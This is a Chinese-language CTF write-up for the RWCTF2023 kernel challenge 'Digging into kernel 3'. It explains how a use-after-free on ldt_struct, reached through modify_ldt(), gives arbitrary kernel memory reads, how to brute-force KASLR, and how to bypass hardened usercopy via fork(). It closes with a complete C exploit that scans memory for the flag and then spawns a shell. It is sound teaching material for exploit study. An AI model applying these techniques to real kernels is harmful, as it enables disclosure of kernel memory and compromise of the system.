在内存中直接搜索 flag¶

Initial RAM disk（initrd）提供了在 boot loader 阶段载入一个 RAM disk 并挂载为根文件系统的能力，从而在该阶段运行一些用户态程序，在完成该阶段工作之后才是挂载真正的根文件系统。

initrd 文件系统镜像通常为 gzip 格式，在启动阶段由 boot loader 将其路径传给 kernel，自 2.6 版本后出现了使用 cpio 格式的initramfs，从而无需挂载便能展开为一个文件系统。

initrd/initramfs 的特点便是文件系统中的所有内容都会被读取到内存当中，而大部分 CTF 中的 kernel pwn 题目都选择直接将 initrd 作为根文件系统，因此若是我们有着内存搜索能力，我们便能直接在内存空间中搜索 flag 的内容 ：）

例题：RWCTF2023体验赛 - Digging into kernel 3¶

题目分析¶

题目已经在前面分析过了，这里笔者就不重复分析了：）

漏洞利用：ldt_struct 直接读取 initramfs 内容¶

既然题目中已经直接白给出了一个无限制的 UAF，那么利用方式就是多种多样的了 :-D 这里笔者选择利用 ldt_struct 直接在内存空间中搜索 flag 的方式解题。

Step.I - 利用 ldt_struct 进行任意内存读取¶

ldt 即局部段描述符表（Local Descriptor Table），其中存放着进程的段描述符，段寄存器当中存放着的段选择子便是段描述符表中段描述符的索引，在内核中与 ldt 相关联的结构体为 ldt_struct ，该结构体定义如下， entries 指针指向一块描述符表的内存，nr_entries 表示 LDT 中的描述符数量：

struct ldt_struct {
    /*
     * Xen requires page-aligned LDTs with special permissions.  This is
     * needed to prevent us from installing evil descriptors such as
     * call gates.  On native, we could merge the ldt_struct and LDT
     * allocations, but it's not worth trying to optimize.
     */
    struct desc_struct    *entries;
    unsigned int        nr_entries;

    /*
     * If PTI is in use, then the entries array is not mapped while we're
     * in user mode.  The whole array will be aliased at the addressed
     * given by ldt_slot_va(slot).  We use two slots so that we can allocate
     * and map, and enable a new LDT without invalidating the mapping
     * of an older, still-in-use LDT.
     *
     * slot will be -1 if this LDT doesn't have an alias mapping.
     */
    int            slot;
};

我们主要关注该结构体如何用作漏洞利用，Linux 提供了一个 modify_ldt() 系统调用操纵当前进程的 ldt_struct 结构体：

SYSCALL_DEFINE3(modify_ldt, int , func , void __user * , ptr ,
        unsigned long , bytecount)
{
    int ret = -ENOSYS;

    switch (func) {
    case 0:
        ret = read_ldt(ptr, bytecount);
        break;
    case 1:
        ret = write_ldt(ptr, bytecount, 1);
        break;
    case 2:
        ret = read_default_ldt(ptr, bytecount);
        break;
    case 0x11:
        ret = write_ldt(ptr, bytecount, 0);
        break;
    }
    /*
     * The SYSCALL_DEFINE() macros give us an 'unsigned long'
     * return type, but tht ABI for sys_modify_ldt() expects
     * 'int'.  This cast gives us an int-sized value in %rax
     * for the return code.  The 'unsigned' is necessary so
     * the compiler does not try to sign-extend the negative
     * return codes into the high half of the register when
     * taking the value from int->long.
     */
    return (unsigned int)ret;
}

对于 write_ldt() 而言其最终会调用 alloc_ldt_struct() 分配 ldt 结构体，由于走的是通用的分配路径所以我们可以在该结构体上完成 UAF ：）

/* The caller must call finalize_ldt_struct on the result. LDT starts zeroed. */
static struct ldt_struct *alloc_ldt_struct(unsigned int num_entries)
{
    struct ldt_struct *new_ldt;
    unsigned int alloc_size;

    if (num_entries > LDT_ENTRIES)
        return NULL;

    new_ldt = kmalloc(sizeof(struct ldt_struct), GFP_KERNEL);
//...

而 read_ldt() 就是简单的读出 LDT 表上内容到用户空间，由于我们有无限制的 UAF，故可以修改 ldt->entries 完成内核空间中的任意地址读：

static int read_ldt(void __user *ptr, unsigned long bytecount)
{
//...
    if (copy_to_user(ptr, mm->context.ldt->entries, entries_size)) {
        retval = -EFAULT;
        goto out_unlock;
    }
//...
out_unlock:
    up_read(&mm->context.ldt_usr_sem);
    return retval;
}

read_ldt() 还能帮助我们绕过 KASLR ，这里我们要用到 copy_to_user() 的一个特性：对于非法地址，其并不会造成 kernel panic，只会返回一个非零的错误码，我们不难想到的是，我们可以多次修改 ldt->entries 并多次调用 modify_ldt() 以爆破内核的 page_offset_base，若是成功命中，则 modify_ldt 会返回给我们一个非负值。

不过由于 hardened usercopy 的存在，我们并不能够直接读取内核代码段或是线性映射区中大小不符的对象的内容，否则会造成 kernel panic。

Step.II - 利用 fork 绕过 hardened usercopy¶

虽然在用户空间与内核空间之间的数据拷贝存在 hardened usercopy，但是在内核空间到内核空间的数据拷贝间并不存在类似的保护机制，因此我们可以通过一些手段绕过 hardended usercopy。

阅读 Linux 内核源码，我们不难观察到当进程调用 fork() 时，内核会通过 memcpy() 将父进程的 ldt->entries 上的内容拷贝给子进程：

/*
 * Called on fork from arch_dup_mmap(). Just copy the current LDT state,
 * the new task is not running, so nothing can be installed.
 */
int ldt_dup_context(struct mm_struct *old_mm, struct mm_struct *mm)
{
    //...

    memcpy(new_ldt->entries, old_mm->context.ldt->entries,
           new_ldt->nr_entries * LDT_ENTRY_SIZE);

       //...
}

该操作是完全处在内核中的操作，因此不会触发 hardened usercopy 的检查，我们只需要在父进程中设定好搜索的地址之后再开子进程来用 read_ldt() 读取数据即可。

EXPLOIT¶

最后的 exp 如下，这也是笔者在比赛时所用的解法：

#define _GNU_SOURCE
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <sys/wait.h>
#include <asm/ldt.h>
#include <stdio.h>
#include <signal.h>
#include <pthread.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <ctype.h>
#include <stdint.h>

int dev_fd;

struct node {
    uint32_t idx;
    uint32_t size;
    void *buf;
};

void err_exit(char * msg)
{
    printf("[x] %s \n", msg);
    exit(EXIT_FAILURE);
}

void alloc(uint32_t idx, uint32_t size, void *buf)
{
    struct node n = {
        .idx = idx,
        .size = size,
        .buf = buf,
    };

    ioctl(dev_fd, 0xDEADBEEF, &n);
}

void del(uint32_t idx)
{
    struct node n = {
        .idx = idx,
    };

    ioctl(dev_fd, 0xC0DECAFE, &n);
}

int main(int argc, char **argv, char **envp)
{
    struct user_desc desc;
    uint64_t page_offset_base = 0xffff888000000000;
    uint64_t secondary_startup_64;
    uint64_t kernel_base = 0xffffffff81000000, kernel_offset;
    uint64_t search_addr, flag_addr = -1;
    uint64_t temp;
    uint64_t ldt_buf[0x10];
    char *buf;
    char flag[0x100];
    int pipe_fd[2];
    int retval;
    cpu_set_t cpu_set;

    /* bind to CPU core 0 */
    CPU_ZERO(&cpu_set);
    CPU_SET(0, &cpu_set);
    sched_setaffinity(0, sizeof(cpu_set), &cpu_set);

    dev_fd = open("/dev/rwctf", O_RDONLY);
    if (dev_fd < 0) {
        err_exit("FAILED to open the /dev/rwctf file!");
    }

    /* init descriptor info */
    desc.base_addr = 0xff0000;
    desc.entry_number = 0x8000 / 8;
    desc.limit = 0;
    desc.seg_32bit = 0;
    desc.contents = 0;
    desc.limit_in_pages = 0;
    desc.lm = 0;
    desc.read_exec_only = 0;
    desc.seg_not_present = 0;
    desc.useable = 0;

    alloc(0, 16, "arttnba3rat3bant");
    del(0);
    syscall(SYS_modify_ldt, 1, &desc, sizeof(desc));

    /* leak kernel direct mapping area by modify_ldt() */
    while(1) {
        ldt_buf[0] = page_offset_base;
        ldt_buf[1] = 0x8000 / 8;
        del(0);
        alloc(0, 16, ldt_buf);
        retval = syscall(SYS_modify_ldt, 0, &temp, 8);
        if (retval > 0) {
            printf("[-] read data: 0x%lx\n", temp);
            break;
        }
        else if (retval == 0) {
            err_exit("no mm->context.ldt!");
        }
        page_offset_base += 0x1000000;
    }
    printf("[+] Found page_offset_base: 0x%lx\n", page_offset_base);

    /* leak kernel base from direct mappinig area by modify_ldt() */
    ldt_buf[0] = page_offset_base + 0x9d000;
    ldt_buf[1] = 0x8000 / 8;
    del(0);
    alloc(0, 16, ldt_buf);
    syscall(SYS_modify_ldt, 0, &secondary_startup_64, 8);
    kernel_offset = secondary_startup_64 - 0xffffffff81000060;
    kernel_base += kernel_offset;
    printf("[*] Get  secondary_startup_64: 0x%lx\n", secondary_startup_64);
    printf("[+] kernel_base: 0x%lx\n", kernel_base);
    printf("[+] kernel_offset: 0x%lx\n", kernel_offset);

    /* search for flag in kernel space */
    search_addr = page_offset_base;
    pipe(pipe_fd);
    buf = (char*) mmap(NULL, 0x8000, 
                        PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, 
                        0, 0);
    while(1) {
        ldt_buf[0] = search_addr;
        ldt_buf[1] = 0x8000 / 8;
        del(0);
        alloc(0, 16, ldt_buf);
        int ret = fork();
        if (!ret) { // child
            char *result_addr;

            syscall(SYS_modify_ldt, 0, buf, 0x8000);
            result_addr = memmem(buf, 0x8000, "rwctf{", 6);
            if (result_addr) {
                for (int i = 0; i < 0x100; i++) {
                    if (result_addr[i] == '}') {
                        flag_addr = search_addr + (uint64_t)(result_addr - buf);
                        printf("[+] Found flag at addr: 0x%lx\n", flag_addr);
                    }
                }
            }
            write(pipe_fd[1], &flag_addr, 8);
            exit(0);
        }
        wait(NULL);
        read(pipe_fd[0], &flag_addr, 8);
        if (flag_addr != -1) {
            break;
        }
        search_addr += 0x8000;
    }

    /* read flag */
    memset(flag, 0, sizeof(flag));
    ldt_buf[0] = flag_addr;
    ldt_buf[1] = 0x8000 / 8;
    del(0);
    alloc(0, 16, ldt_buf);
    syscall(SYS_modify_ldt, 0, flag, 0x100);
    printf("[+] flag: %s\n", flag);

    system("/bin/sh");

    return 0;
}